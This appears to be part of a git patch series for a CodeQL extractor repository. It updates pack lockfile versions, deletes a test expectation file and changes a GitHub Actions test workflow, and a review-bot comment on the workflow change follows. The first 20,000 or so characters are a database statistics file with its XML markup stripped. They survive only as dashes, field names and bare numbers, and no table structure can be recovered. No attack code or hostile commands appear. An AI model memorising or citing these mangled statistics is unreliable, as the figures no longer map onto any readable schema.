- -idx -id - - -12 - - -2 -3 -1 - - -4 -5 -3 - - -6 -7 -4 - - -8 -9 -1 - - -11 -12 -1 - - -23 -24 -1 - - -32 -33 -1 - - -93 -94 -1 - - -165 -166 -1 - - -340 -341 -1 - - -750 -751 -1 - - -21021 -21022 -1 - - - - - - -idx -kind - - -12 - - -1 -2 -5 - - -2 -3 -7 - - -5 -6 -1 - - -6 -7 -1 - - -10 -11 -1 - - -11 -12 -1 - - -13 -14 -1 - - - - - - -idx -parent - - -12 - - -2 -3 -1 - - -4 -5 -3 - - -6 -7 -4 - - -8 -9 -1 - - -11 -12 -1 - - -23 -24 -1 - - -32 -33 -1 - - -93 -94 -1 - - -165 -166 -1 - - -340 -341 -1 - - -750 -751 -1 - - -21021 -21022 -1 - - - - - - -idx -tostring - - -12 - - -2 -3 -2 - - -3 -4 -3 - - -4 -5 -3 - - -5 -6 -1 - - -6 -7 -1 - - -11 -12 -1 - - -17 -18 -1 - - -21 -22 -1 - - -23 -24 -1 - - -42 -43 -1 - - -103 -104 -1 - - -1378 -1379 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -713 - - -2 -3 -271 - - -3 -4 -105 - - -4 -6 -110 - - -6 -12 -111 - - -12 -77 -109 - - -77 -2754 -28 - - - - - - -tostring -kind - - -12 - - -1 -2 -1446 - - -2 -3 -1 - - - - - - -tostring -parent - - -12 - - -1 -2 -713 - - -2 -3 -271 - - -3 -4 -105 - - -4 -6 -110 - - -6 -12 -112 - - -12 -78 -110 - - -78 -2747 -26 - - - - - - -tostring -idx - - -12 - - -1 -2 -1356 - - -2 -15 -91 - - - - - - - - -jsdoc_record_field_name -241 - - -id -90 - - -idx -15 - - -name -123 - - - - -id -idx - - -12 - - -1 -2 -47 - - -2 -3 -19 - - -3 -4 -8 - - -4 -7 -8 - - -7 -16 -8 - - - - - - -id -name - - -12 - - -1 -2 -47 - - -2 -3 -19 - - -3 -4 -8 - - -4 -7 -8 - - -7 -16 -8 - - - - - - -idx -id - - -12 - - -2 -3 -1 - - -4 -5 -3 - - -6 -7 -4 - - -8 -9 -1 - - -10 -11 -1 - - -12 -13 -1 - - -16 -17 -1 - - -24 -25 -1 - - -43 -44 -1 - - -90 -91 -1 - - - - - - -idx -name - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -2 - - -5 -6 -3 - - -6 -7 -1 - - -8 -9 -1 - - -10 -11 -1 - - -12 -13 -1 - - -13 -14 -1 - - -18 -19 -1 - - -29 -30 -1 - - -37 -38 -1 - - - - - - -name -id - - -12 - - -1 -2 -65 - - -2 -3 -40 - - -3 -4 -6 - - -4 -7 -10 - - -9 -25 -2 - - - - - - -name -idx - - -12 - - -1 -2 -87 - - -2 -3 -34 - - -3 -4 
-2 - - - - - - - - -jsdoc_prefix_qualifier -823 - - -id -823 - - - - - -jsdoc_has_new_parameter -22 - - -fn -22 - - - - - -jsdoc_errors -id -1658 - - -id -1658 - - -tag -1460 - - -message -203 - - -tostring -89 - - - - -id -tag - - -12 - - -1 -2 -1658 - - - - - - -id -message - - -12 - - -1 -2 -1658 - - - - - - -id -tostring - - -12 - - -1 -2 -1658 - - - - - - -tag -id - - -12 - - -1 -2 -1262 - - -2 -3 -198 - - - - - - -tag -message - - -12 - - -1 -2 -1262 - - -2 -3 -198 - - - - - - -tag -tostring - - -12 - - -1 -2 -1262 - - -2 -3 -198 - - - - - - -message -id - - -12 - - -1 -2 -144 - - -2 -3 -27 - - -3 -7 -16 - - -7 -347 -16 - - - - - - -message -tag - - -12 - - -1 -2 -144 - - -2 -3 -27 - - -3 -7 -16 - - -7 -347 -16 - - - - - - -message -tostring - - -12 - - -1 -2 -203 - - - - - - -tostring -id - - -12 - - -1 -2 -48 - - -2 -3 -10 - - -3 -4 -3 - - -4 -5 -6 - - -5 -8 -7 - - -11 -27 -7 - - -34 -347 -7 - - -477 -478 -1 - - - - - - -tostring -tag - - -12 - - -1 -2 -48 - - -2 -3 -10 - - -3 -4 -3 - - -4 -5 -6 - - -5 -8 -7 - - -11 -27 -7 - - -34 -347 -7 - - -477 -478 -1 - - - - - - -tostring -message - - -12 - - -1 -2 -66 - - -2 -3 -6 - - -3 -4 -3 - - -4 -7 -7 - - -8 -25 -7 - - - - - - - - -yaml -id -885 - - -id -885 - - -kind -4 - - -parent -204 - - -idx -25 - - -tag -8 - - -tostring -318 - - - - -id -kind - - -12 - - -1 -2 -885 - - - - - - -id -parent - - -12 - - -1 -2 -885 - - - - - - -id -idx - - -12 - - -1 -2 -885 - - - - - - -id -tag - - -12 - - -1 -2 -885 - - - - - - -id -tostring - - -12 - - -1 -2 -885 - - - - - - -kind -id - - -12 - - -1 -2 -1 - - -35 -36 -1 - - -149 -150 -1 - - -700 -701 -1 - - - - - - -kind -parent - - -12 - - -1 -2 -1 - - -33 -34 -1 - - -90 -91 -1 - - -183 -184 -1 - - - - - - -kind -idx - - -12 - - -1 -2 -1 - - -7 -8 -1 - - -11 -12 -1 - - -25 -26 -1 - - - - - - -kind -tag - - -12 - - -1 -2 -3 - - -5 -6 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -1 - - -10 -11 -1 - - -67 -68 -1 - - -240 -241 -1 - - - - - - -parent -id - - -12 - - -1 -2 
-33 - - -2 -3 -72 - - -3 -4 -2 - - -4 -5 -35 - - -6 -7 -29 - - -8 -11 -14 - - -12 -21 -17 - - -22 -25 -2 - - - - - - -parent -kind - - -12 - - -1 -2 -131 - - -2 -3 -43 - - -3 -4 -30 - - - - - - -parent -idx - - -12 - - -1 -2 -33 - - -2 -3 -72 - - -3 -4 -2 - - -4 -5 -35 - - -6 -7 -29 - - -8 -11 -14 - - -12 -21 -17 - - -22 -25 -2 - - - - - - -parent -tag - - -12 - - -1 -2 -120 - - -2 -3 -41 - - -3 -4 -36 - - -4 -5 -7 - - - - - - -parent -tostring - - -12 - - -1 -2 -33 - - -2 -3 -72 - - -3 -4 -2 - - -4 -5 -35 - - -5 -6 -5 - - -6 -7 -24 - - -8 -11 -14 - - -12 -14 -16 - - -16 -23 -3 - - - - - - -idx -id - - -12 - - -1 -2 -2 - - -2 -3 -2 - - -4 -5 -7 - - -5 -20 -2 - - -20 -25 -2 - - -25 -33 -2 - - -33 -56 -2 - - -61 -64 -2 - - -95 -100 -2 - - -149 -172 -2 - - - - - - -idx -kind - - -12 - - -1 -2 -14 - - -2 -3 -4 - - -3 -4 -6 - - -4 -5 -1 - - - - - - -idx -parent - - -12 - - -1 -2 -2 - - -2 -3 -2 - - -4 -5 -7 - - -5 -20 -2 - - -20 -25 -2 - - -25 -33 -2 - - -33 -56 -2 - - -61 -64 -2 - - -95 -100 -2 - - -149 -172 -2 - - - - - - -idx -tag - - -12 - - -1 -2 -11 - - -2 -3 -5 - - -3 -4 -3 - - -4 -5 -4 - - -6 -7 -2 - - - - - - -idx -tostring - - -12 - - -1 -2 -2 - - -2 -3 -2 - - -3 -4 -3 - - -4 -5 -4 - - -5 -7 -2 - - -7 -11 -2 - - -12 -15 -2 - - -15 -16 -1 - - -18 -19 -2 - - -28 -31 -2 - - -52 -56 -2 - - -87 -88 -1 - - - - - - -tag -id - - -12 - - -1 -2 -2 - - -4 -5 -1 - - -15 -16 -1 - - -26 -27 -1 - - -35 -36 -1 - - -149 -150 -1 - - -654 -655 -1 - - - - - - -tag -kind - - -12 - - -1 -2 -8 - - - - - - -tag -parent - - -12 - - -1 -2 -2 - - -2 -3 -1 - - -3 -4 -1 - - -25 -26 -1 - - -33 -34 -1 - - -90 -91 -1 - - -183 -184 -1 - - - - - - -tag -idx - - -12 - - -1 -2 -2 - - -3 -4 -2 - - -7 -8 -1 - - -9 -10 -1 - - -11 -12 -1 - - -23 -24 -1 - - - - - - -tag -tostring - - -12 - - -1 -2 -3 - - -2 -3 -1 - - -10 -11 -1 - - -13 -14 -1 - - -67 -68 -1 - - -223 -224 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -209 - - -2 -3 -42 - - -3 -6 -29 - - -6 -15 -25 - - -15 -18 -13 - - - - - - 
-tostring -kind - - -12 - - -1 -2 -318 - - - - - - -tostring -parent - - -12 - - -1 -2 -213 - - -2 -3 -41 - - -3 -6 -27 - - -6 -15 -25 - - -15 -18 -12 - - - - - - -tostring -idx - - -12 - - -1 -2 -272 - - -2 -3 -34 - - -3 -10 -12 - - - - - - -tostring -tag - - -12 - - -1 -2 -318 - - - - - - - - -yaml_anchors -1 - - -node -1 - - -anchor -1 - - - - -node -anchor - - -12 - - -1 -2 -1 - - - - - - -anchor -node - - -12 - - -1 -2 -1 - - - - - - - - -yaml_aliases -1 - - -alias -1 - - -target -1 - - - - -alias -target - - -12 - - -1 -2 -1 - - - - - - -target -alias - - -12 - - -1 -2 -1 - - - - - - - - -yaml_scalars -700 - - -scalar -700 - - -style -3 - - -value -241 - - - - -scalar -style - - -12 - - -1 -2 -700 - - - - - - -scalar -value - - -12 - - -1 -2 -700 - - - - - - -style -scalar - - -12 - - -14 -15 -1 - - -97 -98 -1 - - -589 -590 -1 - - - - - - -style -value - - -12 - - -12 -13 -1 - - -47 -48 -1 - - -183 -184 -1 - - - - - - -value -scalar - - -12 - - -1 -2 -158 - - -2 -3 -32 - - -3 -6 -19 - - -6 -15 -20 - - -15 -18 -12 - - - - - - -value -style - - -12 - - -1 -2 -240 - - -2 -3 -1 - - - - - - - - -yaml_errors -id -1 - - -id -1 - - -message -1 - - - - -id -message - - -12 - - -1 -2 -1 - - - - - - -message -id - - -12 - - -1 -2 -1 - - - - - - - - -yaml_locations -71 - - -locatable -71 - - -location -71 - - - - -locatable -location - - -12 - - -1 -2 -71 - - - - - - -location -locatable - - -12 - - -1 -2 -71 - - - - - - - - -xmlEncoding -39724 - - -id -39724 - - -encoding -1 - - - - -id -encoding - - -12 - - -1 -2 -39724 - - - - - - -encoding -id - - -12 - - -39724 -39725 -1 - - - - - - - - -xmlDTDs -1 - - -id -1 - - -root -1 - - -publicId -1 - - -systemId -1 - - -fileid -1 - - - - -id -root - - -12 - - -1 -2 -1 - - - - - - -id -publicId - - -12 - - -1 -2 -1 - - - - - - -id -systemId - - -12 - - -1 -2 -1 - - - - - - -id -fileid - - -12 - - -1 -2 -1 - - - - - - -root -id - - -12 - - -1 -2 -1 - - - - - - -root -publicId - - -12 - - -1 -2 -1 - - - - - - -root -systemId - - 
-12 - - -1 -2 -1 - - - - - - -root -fileid - - -12 - - -1 -2 -1 - - - - - - -publicId -id - - -12 - - -1 -2 -1 - - - - - - -publicId -root - - -12 - - -1 -2 -1 - - - - - - -publicId -systemId - - -12 - - -1 -2 -1 - - - - - - -publicId -fileid - - -12 - - -1 -2 -1 - - - - - - -systemId -id - - -12 - - -1 -2 -1 - - - - - - -systemId -root - - -12 - - -1 -2 -1 - - - - - - -systemId -publicId - - -12 - - -1 -2 -1 - - - - - - -systemId -fileid - - -12 - - -1 -2 -1 - - - - - - -fileid -id - - -12 - - -1 -2 -1 - - - - - - -fileid -root - - -12 - - -1 -2 -1 - - - - - - -fileid -publicId - - -12 - - -1 -2 -1 - - - - - - -fileid -systemId - - -12 - - -1 -2 -1 - - - - - - - - -xmlElements -1270313 - - -id -1270313 - - -name -4655 - - -parentid -578021 - - -idx -35122 - - -fileid -39721 - - - - -id -name - - -12 - - -1 -2 -1270313 - - - - - - -id -parentid - - -12 - - -1 -2 -1270313 - - - - - - -id -idx - - -12 - - -1 -2 -1270313 - - - - - - -id -fileid - - -12 - - -1 -2 -1270313 - - - - - - -name -id - - -12 - - -1 -2 -420 - - -2 -5 -156 - - -5 -6 -3832 - - -6 -310317 -247 - - - - - - -name -parentid - - -12 - - -1 -2 -456 - - -2 -5 -150 - - -5 -6 -3829 - - -6 -161565 -220 - - - - - - -name -idx - - -12 - - -1 -2 -4358 - - -2 -35123 -297 - - - - - - -name -fileid - - -12 - - -1 -2 -486 - - -2 -5 -133 - - -5 -6 -3831 - - -6 -14503 -205 - - - - - - -parentid -id - - -12 - - -1 -2 -371969 - - -2 -3 -62095 - - -3 -4 -104113 - - -4 -35123 -39844 - - - - - - -parentid -name - - -12 - - -1 -2 -500482 - - -2 -3 -17866 - - -3 -4 -49117 - - -4 -45 -10556 - - - - - - -parentid -idx - - -12 - - -1 -2 -371969 - - -2 -3 -62095 - - -3 -4 -104113 - - -4 -35123 -39844 - - - - - - -parentid -fileid - - -12 - - -1 -2 -578021 - - - - - - -idx -id - - -12 - - -2 -3 -606 - - -4 -5 -17851 - - -5 -6 -6533 - - -6 -7 -859 - - -7 -8 -4471 - - -9 -16 -2719 - - -16 -578022 -2083 - - - - - - -idx -name - - -12 - - -1 -2 -18457 - - -2 -3 -6533 - - -3 -4 -6178 - - -4 -8 -2624 - - -8 -4397 -1330 - - - - - - 
-idx -parentid - - -12 - - -2 -3 -606 - - -4 -5 -17851 - - -5 -6 -6533 - - -6 -7 -859 - - -7 -8 -4471 - - -9 -16 -2719 - - -16 -578022 -2083 - - - - - - -idx -fileid - - -12 - - -2 -3 -606 - - -4 -5 -17851 - - -5 -6 -6533 - - -6 -7 -859 - - -7 -8 -4471 - - -9 -16 -2719 - - -16 -39722 -2083 - - - - - - -fileid -id - - -12 - - -1 -2 -20457 - - -2 -3 -3115 - - -3 -7 -3026 - - -7 -8 -3588 - - -8 -9 -2220 - - -9 -11 -3099 - - -11 -19 -3087 - - -19 -114506 -1129 - - - - - - -fileid -name - - -12 - - -1 -2 -20459 - - -2 -3 -3458 - - -3 -5 -2569 - - -5 -7 -2172 - - -7 -8 -6158 - - -8 -9 -3501 - - -9 -46 -1404 - - - - - - -fileid -parentid - - -12 - - -1 -2 -20457 - - -2 -3 -3870 - - -3 -5 -2152 - - -5 -6 -2876 - - -6 -7 -2720 - - -7 -8 -4132 - - -8 -14 -3096 - - -14 -31079 -418 - - - - - - -fileid -idx - - -12 - - -1 -2 -25894 - - -2 -3 -5301 - - -3 -4 -3787 - - -4 -6 -3268 - - -6 -35123 -1471 - - - - - - - - -xmlAttrs -1202020 - - -id -1202020 - - -elementid -760198 - - -name -3649 - - -value -121803 - - -idx -2000 - - -fileid -39448 - - - - -id -elementid - - -12 - - -1 -2 -1202020 - - - - - - -id -name - - -12 - - -1 -2 -1202020 - - - - - - -id -value - - -12 - - -1 -2 -1202020 - - - - - - -id -idx - - -12 - - -1 -2 -1202020 - - - - - - -id -fileid - - -12 - - -1 -2 -1202020 - - - - - - -elementid -id - - -12 - - -1 -2 -425697 - - -2 -3 -249659 - - -3 -4 -66474 - - -4 -2001 -18368 - - - - - - -elementid -name - - -12 - - -1 -2 -425778 - - -2 -3 -249579 - - -3 -4 -66475 - - -4 -2001 -18366 - - - - - - -elementid -value - - -12 - - -1 -2 -466237 - - -2 -3 -266291 - - -3 -46 -27670 - - - - - - -elementid -idx - - -12 - - -1 -2 -425697 - - -2 -3 -249659 - - -3 -4 -66474 - - -4 -2001 -18368 - - - - - - -elementid -fileid - - -12 - - -1 -2 -760198 - - - - - - -name -id - - -12 - - -1 -2 -3467 - - -2 -262475 -182 - - - - - - -name -elementid - - -12 - - -1 -2 -3467 - - -2 -262475 -182 - - - - - - -name -value - - -12 - - -1 -2 -3501 - - -2 -54146 -148 - - - - - - -name -idx - 
- -12 - - -1 -2 -3531 - - -2 -11 -118 - - - - - - -name -fileid - - -12 - - -1 -2 -3491 - - -2 -21768 -158 - - - - - - -value -id - - -12 - - -1 -2 -72032 - - -2 -3 -42366 - - -3 -199269 -7405 - - - - - - -value -elementid - - -12 - - -1 -2 -72036 - - -2 -3 -42374 - - -3 -199269 -7393 - - - - - - -value -name - - -12 - - -1 -2 -116722 - - -2 -2041 -5081 - - - - - - -value -idx - - -12 - - -1 -2 -117957 - - -2 -2001 -3846 - - - - - - -value -fileid - - -12 - - -1 -2 -86306 - - -2 -3 -28570 - - -3 -4175 -6927 - - - - - - -idx -id - - -12 - - -1 -2 -1955 - - -2 -760199 -45 - - - - - - -idx -elementid - - -12 - - -1 -2 -1955 - - -2 -760199 -45 - - - - - - -idx -name - - -12 - - -1 -2 -1955 - - -2 -189 -45 - - - - - - -idx -value - - -12 - - -1 -2 -1955 - - -2 -116643 -45 - - - - - - -idx -fileid - - -12 - - -1 -2 -1955 - - -2 -39449 -45 - - - - - - -fileid -id - - -12 - - -1 -2 -22884 - - -2 -4 -2565 - - -4 -6 -2294 - - -6 -7 -3299 - - -7 -9 -3272 - - -9 -16 -3143 - - -16 -129952 -1991 - - - - - - -fileid -elementid - - -12 - - -1 -2 -23890 - - -2 -4 -2131 - - -4 -5 -1971 - - -5 -6 -4096 - - -6 -8 -3519 - - -8 -16 -3137 - - -16 -106600 -704 - - - - - - -fileid -name - - -12 - - -1 -2 -22946 - - -2 -3 -2338 - - -3 -4 -2726 - - -4 -5 -2824 - - -5 -6 -2994 - - -6 -7 -3876 - - -7 -2002 -1744 - - - - - - -fileid -value - - -12 - - -1 -2 -22916 - - -2 -4 -2772 - - -4 -5 -2112 - - -5 -6 -3510 - - -6 -8 -1993 - - -8 -11 -3365 - - -11 -50357 -2780 - - - - - - -fileid -idx - - -12 - - -1 -2 -26133 - - -2 -3 -9699 - - -3 -5 -3511 - - -5 -2001 -105 - - - - - - - - -xmlNs -71201 - - -id -4185 - - -prefixName -958 - - -URI -4185 - - -fileid -39544 - - - - -id -prefixName - - -12 - - -1 -2 -2602 - - -2 -3 -1553 - - -3 -872 -30 - - - - - - -id -URI - - -12 - - -1 -2 -4185 - - - - - - -id -fileid - - -12 - - -1 -6 -274 - - -6 -7 -3825 - - -7 -24905 -86 - - - - - - -prefixName -id - - -12 - - -1 -2 -915 - - -2 -4054 -43 - - - - - - -prefixName -URI - - -12 - - -1 -2 -915 - - -2 -4054 
-43 - - - - - - -prefixName -fileid - - -12 - - -1 -2 -828 - - -2 -5 -73 - - -5 -24903 -57 - - - - - - -URI -id - - -12 - - -1 -2 -4185 - - - - - - -URI -prefixName - - -12 - - -1 -2 -2602 - - -2 -3 -1553 - - -3 -872 -30 - - - - - - -URI -fileid - - -12 - - -1 -6 -274 - - -6 -7 -3825 - - -7 -24905 -86 - - - - - - -fileid -id - - -12 - - -1 -2 -11655 - - -2 -3 -26146 - - -3 -8 -1743 - - - - - - -fileid -prefixName - - -12 - - -1 -2 -11653 - - -2 -3 -25982 - - -3 -31 -1909 - - - - - - -fileid -URI - - -12 - - -1 -2 -11655 - - -2 -3 -26146 - - -3 -8 -1743 - - - - - - - - -xmlHasNs -1139730 - - -elementId -1139730 - - -nsId -4136 - - -fileid -39537 - - - - -elementId -nsId - - -12 - - -1 -2 -1139730 - - - - - - -elementId -fileid - - -12 - - -1 -2 -1139730 - - - - - - -nsId -elementId - - -12 - - -1 -5 -234 - - -5 -6 -3824 - - -6 -643289 -78 - - - - - - -nsId -fileid - - -12 - - -1 -5 -257 - - -5 -6 -3823 - - -6 -24759 -56 - - - - - - -fileid -elementId - - -12 - - -1 -2 -3669 - - -2 -3 -20429 - - -3 -7 -2536 - - -7 -8 -3473 - - -8 -9 -2258 - - -9 -11 -3036 - - -11 -18 -2966 - - -18 -147552 -1170 - - - - - - -fileid -nsId - - -12 - - -1 -2 -18261 - - -2 -3 -21032 - - -3 -8 -244 - - - - - - - - -xmlComments -26812 - - -id -26812 - - -text -22933 - - -parentid -26546 - - -fileid -26368 - - - - -id -text - - -12 - - -1 -2 -26812 - - - - - - -id -parentid - - -12 - - -1 -2 -26812 - - - - - - -id -fileid - - -12 - - -1 -2 -26812 - - - - - - -text -id - - -12 - - -1 -2 -21517 - - -2 -62 -1416 - - - - - - -text -parentid - - -12 - - -1 -2 -21519 - - -2 -62 -1414 - - - - - - -text -fileid - - -12 - - -1 -2 -21522 - - -2 -62 -1411 - - - - - - -parentid -id - - -12 - - -1 -2 -26379 - - -2 -17 -167 - - - - - - -parentid -text - - -12 - - -1 -2 -26379 - - -2 -17 -167 - - - - - - -parentid -fileid - - -12 - - -1 -2 -26546 - - - - - - -fileid -id - - -12 - - -1 -2 -26161 - - -2 -17 -207 - - - - - - -fileid -text - - -12 - - -1 -2 -26165 - - -2 -17 -203 - - - - - - -fileid -parentid 
- - -12 - - -1 -2 -26223 - - -2 -10 -145 - - - - - - - - -xmlChars -439958 - - -id -439958 - - -text -100518 - - -parentid -433851 - - -idx -4 - - -isCDATA -1 - - -fileid -26494 - - - - -id -text - - -12 - - -1 -2 -439958 - - - - - - -id -parentid - - -12 - - -1 -2 -439958 - - - - - - -id -idx - - -12 - - -1 -2 -439958 - - - - - - -id -isCDATA - - -12 - - -1 -2 -439958 - - - - - - -id -fileid - - -12 - - -1 -2 -439958 - - - - - - -text -id - - -12 - - -1 -2 -60389 - - -2 -4 -3811 - - -4 -5 -29257 - - -5 -23171 -7061 - - - - - - -text -parentid - - -12 - - -1 -2 -60389 - - -2 -4 -3811 - - -4 -5 -29257 - - -5 -23171 -7061 - - - - - - -text -idx - - -12 - - -1 -2 -100517 - - -2 -3 -1 - - - - - - -text -isCDATA - - -12 - - -1 -2 -100518 - - - - - - -text -fileid - - -12 - - -1 -2 -61284 - - -2 -4 -4205 - - -4 -5 -28328 - - -5 -351 -6701 - - - - - - -parentid -id - - -12 - - -1 -2 -429716 - - -2 -5 -4135 - - - - - - -parentid -text - - -12 - - -1 -2 -429716 - - -2 -5 -4135 - - - - - - -parentid -idx - - -12 - - -1 -2 -429716 - - -2 -5 -4135 - - - - - - -parentid -isCDATA - - -12 - - -1 -2 -433851 - - - - - - -parentid -fileid - - -12 - - -1 -2 -433851 - - - - - - -idx -id - - -12 - - -80 -81 -1 - - -1892 -1893 -1 - - -4135 -4136 -1 - - -433851 -433852 -1 - - - - - - -idx -text - - -12 - - -1 -2 -1 - - -3 -4 -1 - - -16 -17 -1 - - -100499 -100500 -1 - - - - - - -idx -parentid - - -12 - - -80 -81 -1 - - -1892 -1893 -1 - - -4135 -4136 -1 - - -433851 -433852 -1 - - - - - - -idx -isCDATA - - -12 - - -1 -2 -4 - - - - - - -idx -fileid - - -12 - - -4 -5 -1 - - -46 -47 -1 - - -97 -98 -1 - - -26494 -26495 -1 - - - - - - -isCDATA -id - - -12 - - -439958 -439959 -1 - - - - - - -isCDATA -text - - -12 - - -100518 -100519 -1 - - - - - - -isCDATA -parentid - - -12 - - -433851 -433852 -1 - - - - - - -isCDATA -idx - - -12 - - -4 -5 -1 - - - - - - -isCDATA -fileid - - -12 - - -26494 -26495 -1 - - - - - - -fileid -id - - -12 - - -1 -2 -25303 - - -2 -35123 -1191 - - - - - - -fileid -text - - 
-12 - - -1 -2 -25765 - - -2 -35123 -729 - - - - - - -fileid -parentid - - -12 - - -1 -2 -25312 - - -2 -35123 -1182 - - - - - - -fileid -idx - - -12 - - -1 -2 -26397 - - -2 -5 -97 - - - - - - -fileid -isCDATA - - -12 - - -1 -2 -26494 - - - - - - - - -xmllocations -3051056 - - -xmlElement -2982460 - - -location -3051056 - - - - -xmlElement -location - - -12 - - -1 -2 -2978326 - - -2 -24903 -4134 - - - - - - -location -xmlElement - - -12 - - -1 -2 -3051056 - - - - - - - - -filetype -1102 - - -file -1102 - - -filetype -3 - - - - -file -filetype - - -12 - - -1 -2 -1102 - - - - - - -filetype -file - - -12 - - -1 -2 -1 - - -162 -163 -1 - - -939 -940 -1 - - - - - - - - -configs -69795 - - -id -69795 - - - - - -configNames -69794 - - -id -69794 - - -config -69794 - - -name -12859 - - - - -id -config - - -12 - - -1 -2 -69794 - - - - - - -id -name - - -12 - - -1 -2 -69794 - - - - - - -config -id - - -12 - - -1 -2 -69794 - - - - - - -config -name - - -12 - - -1 -2 -69794 - - - - - - -name -id - - -12 - - -1 -2 -4858 - - -2 -3 -593 - - -3 -4 -2806 - - -4 -10 -169 - - -10 -11 -1900 - - -11 -12 -1757 - - -12 -111 -776 - - - - - - -name -config - - -12 - - -1 -2 -4858 - - -2 -3 -593 - - -3 -4 -2806 - - -4 -10 -169 - - -10 -11 -1900 - - -11 -12 -1757 - - -12 -111 -776 - - - - - - - - -configValues -69691 - - -id -69691 - - -config -69691 - - -value -54399 - - - - -id -config - - -12 - - -1 -2 -69691 - - - - - - -id -value - - -12 - - -1 -2 -69691 - - - - - - -config -id - - -12 - - -1 -2 -69691 - - - - - - -config -value - - -12 - - -1 -2 -69691 - - - - - - -value -id - - -12 - - -1 -2 -48220 - - -2 -4 -4804 - - -4 -546 -1375 - - - - - - -value -config - - -12 - - -1 -2 -48220 - - -2 -4 -4804 - - -4 -546 -1375 - - - - - - - - -configLocations -209280 - - -locatable -209280 - - -location -209280 - - - - -locatable -location - - -12 - - -1 -2 -209280 - - - - - - -location -locatable - - -12 - - -1 -2 -209280 - - - - - - - - -extraction_time -378 - - -file -21 - - -extractionPhase -9 
- - -timerKind -2 - - -time -43 - - - - -file -extractionPhase - - -12 - - -9 -10 -21 - - - - - - -file -timerKind - - -12 - - -2 -3 -21 - - - - - - -file -time - - -12 - - -3 -4 -21 - - - - - - -extractionPhase -file - - -12 - - -21 -22 -9 - - - - - - -extractionPhase -timerKind - - -12 - - -2 -3 -9 - - - - - - -extractionPhase -time - - -12 - - -1 -2 -8 - - -42 -43 -1 - - - - - - -timerKind -file - - -12 - - -21 -22 -2 - - - - - - -timerKind -extractionPhase - - -12 - - -9 -10 -2 - - - - - - -timerKind -time - - -12 - - -22 -23 -2 - - - - - - -time -file - - -12 - - -1 -2 -42 - - -21 -22 -1 - - - - - - -time -extractionPhase - - -12 - - -1 -2 -42 - - -8 -9 -1 - - - - - - -time -timerKind - - -12 - - -1 -2 -42 - - -2 -3 -1 - - - - - - - - -extraction_data -21 - - -file -21 - - -cacheFile -21 - - -fromCache -1 - - -length -21 - - - - -file -cacheFile - - -12 - - -1 -2 -21 - - - - - - -file -fromCache - - -12 - - -1 -2 -21 - - - - - - -file -length - - -12 - - -1 -2 -21 - - - - - - -cacheFile -file - - -12 - - -1 -2 -21 - - - - - - -cacheFile -fromCache - - -12 - - -1 -2 -21 - - - - - - -cacheFile -length - - -12 - - -1 -2 -21 - - - - - - -fromCache -file - - -12 - - -21 -22 -1 - - - - - - -fromCache -cacheFile - - -12 - - -21 -22 -1 - - - - - - -fromCache -length - - -12 - - -21 -22 -1 - - - - - - -length -file - - -12 - - -1 -2 -21 - - - - - - -length -cacheFile - - -12 - - -1 -2 -21 - - - - - - -length -fromCache - - -12 - - -1 -2 -21 - - - - - - - - - diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 21e0b8bb0e91..c4ef87bc2512 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml 
@@ -2,15 +2,25 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.1 + version: 1.0.10 codeql/dataflow: - version: 1.0.1 + version: 1.1.4 + codeql/javascript-all: + version: 2.0.2 + codeql/mad: + version: 1.0.10 + codeql/regex: + version: 1.0.10 codeql/ssa: - version: 1.0.1 + version: 1.0.10 + codeql/tutorial: + version: 1.0.10 codeql/typetracking: - version: 1.0.1 + version: 1.0.10 codeql/util: - version: 1.0.1 + version: 1.0.10 + codeql/xml: + version: 1.0.10 codeql/yaml: - version: 1.0.1 + version: 1.0.10 compiled: false diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual deleted file mode 100644 index 3c8904a86af1..000000000000 --- a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual +++ /dev/null @@ -1 +0,0 @@ -| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. | From df3b30489b515c36ce9ecd112cca15a6154d70df Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 13 Nov 2024 13:50:41 -0500 Subject: [PATCH 674/707] Add `--search-path` in test workflow --- .github/workflows/test.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 96fd8bdd1a4b..9b07d1e74785 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -27,11 +27,11 @@ jobs: GITHUB_TOKEN: ${{ github.token }} run: | gh repo clone github/codeql - codeql pack install "ql/lib" - codeql pack install "ql/src" - codeql pack install "ql/test" + codeql pack ci "ql/lib" + codeql pack ci "ql/src" + codeql pack ci "ql/test" - name: Run Tests env: GITHUB_TOKEN: ${{ github.token }} run: | - codeql test run ql/test + codeql test run --search-path "${{ github.workspace }}/extractor" ql/test 
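Review bot: The new `--search-path` line interpolates `${{ github.workspace }}` straight into the `run:` script; the value is runner-provided rather than attacker-controlled, so this is not an injection, but this repository's own queries flag `${{ }}` inside `run:` blocks and the environment-variable form sidesteps the pattern entirely: `codeql test run --search-path "$GITHUB_WORKSPACE/extractor" ql/test`. The switch from `codeql pack install` to `codeql pack ci` is a supply-chain improvement because it installs exactly the versions pinned in each `codeql-pack.lock.yml`, but it will also fail the job whenever a lockfile drifts from its `qlpack.yml`, which deserves a comment such as `# pack ci installs the lockfile-pinned versions and fails on drift; refresh with 'codeql pack install' locally and commit the lockfile`. The unchanged `gh repo clone github/codeql` just above still fetches an unpinned default branch, so the test run remains only partially reproducible after this change.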
